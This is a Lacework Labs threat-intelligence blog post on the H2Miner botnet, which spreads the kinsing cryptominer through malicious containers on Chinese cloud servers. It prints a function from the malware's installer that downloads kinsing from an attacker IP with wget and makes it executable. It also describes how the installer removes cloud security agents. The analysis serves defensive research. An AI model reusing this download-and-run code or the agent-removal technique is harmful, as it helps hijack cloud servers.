H2Miner Botnet – Act 2

Chris Hall
Cloud Security Researcher, Lacework Labs

Containers are gaining popularity as malware deployment mechanisms in the cloud. Beginning on Valentine’s Day, one malicious container started making its rounds and has steadily expanded to over 350 infections. The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating via a Redis RCE: New Outbreak of h2Miner Worms Exploiting Redis RCE Detected.

Currently this activity is primarily targeting cloud servers in China. The following chart shows a breakdown of servers by organization. The vast majority belong to Chinese cloud providers such as Aliyun (Alibaba) and Tencent Cloud. 

Figure 1. Bot Orgs

Figure 2. Botnet propagation

The malicious container was originally identified by searching on known malware artifacts in Shodan (https://www.shodan.io/search?query=%22217.12.221.244%22). As shown in Figure 3, there is an observable command that downloads a bash installer, which in turn preps the system and then tries to download the final cryptomining payload. 

Figure 3. Container malware observed in Shodan

The installer will first attempt to remove competing cryptominers. It does this by grepping other mining processes and network connections and then terminates them if found. It will also attempt to avoid detection by uninstalling monitoring agents for Tencent and Alibaba Cloud. The targeted removal of these security agents is likely a reason for the infection concentration among Tencent and Alibaba cloud servers.

The payload mining malware is known as “kinsing” and was previously reported on by Alibaba’s cloud security team. The installer downloads kinsing from one of two URLs and then verifies the hash (a71ad3167f9402d8c5388910862b16ae. The following shows the portion of the installer that’s responsible for this:

download3() {
  $WGET $DIR/kinsing http://217.12.221.244/kinsing
  chmod +x $DIR/kinsing
  if [ -x "$(command -v md5sum)" ]; then
    sum=$(md5sum $DIR/kinsing | awk '{ print $1 }')
    echo $sum
    case $sum in
    a71ad3167f9402d8c5388910862b16ae)
      echo "kinsing OK"
      ;;
    *)
      echo "kinsing wrong"
      ;;
    esac
  else
    echo "No md5sum"
  fi
}

In addition to cryptomining functionality, kinsing also has remote administration features with the ability to run additional malware. Kinsing is a 64 bit ELF executable and was coded in Golang. There are a total of 15 variants on Virus Total with a wide range of detection ratios between 3/61 and 27/61. (Note: these were found by searching on the artifact “main.minerRunning” which is unique to kinsing.)

All variants are hardcoded with the same C2 IPs:

One odd artifact in the kinsing binary is the presence of Shakespeare’s Hamlet – all five Acts of the entire play. The reason for this is unclear however it may be an attempt to confuse analysts by adding noise or a crude technique for avoiding hash-based detections. 

Figure 4. Hamlet Artifacts: “Though this be madness, yet there is method in’t.”

The following are all known kinsing download URLs. The first two were observed in the most recent installer. All of the download URLs hosted on bitbucket are no longer online.

Additional insight into the botnet was obtained by running the IPs through Greynoise. Greynoise is a useful search API and provides additional context on IPs that is unavailable elsewhere. As shown in Figure 4, several of the IPs running the containers were tagged as “Dockerd scanners” and “Kubernetes crawlers.” 

Lacework believes the hosts installed with kinsing were subsequently recruited as scanners by the botnet for self-propagation purposes. While the specific propagation technique was not observed, it’s possibly leveraging the same Redis RCE from January. This is supported by the “Redis Scanner” tag which was the third most common among the hosts. 

Figure 5. Greynoise Tags 

Cyptominers will likely expand their exploitation of cloud resources, especially during this unstable global economy. This has the potential to exacerbate the strain on cloud resources as more people are now working from home. Fortunately, the installation of these programs can easily be detected and mitigated with cloud security agents such as those provided by Lacework and other vendors. 

If you found this blog useful then please share on your social media!

The following is a sampling of indicators. For a complete list, check out our GitHub repository: https://github.com/lacework/lacework-labs/blob/master/blog/h2miner.csv

Photo from Harrison Kugler via Unsplash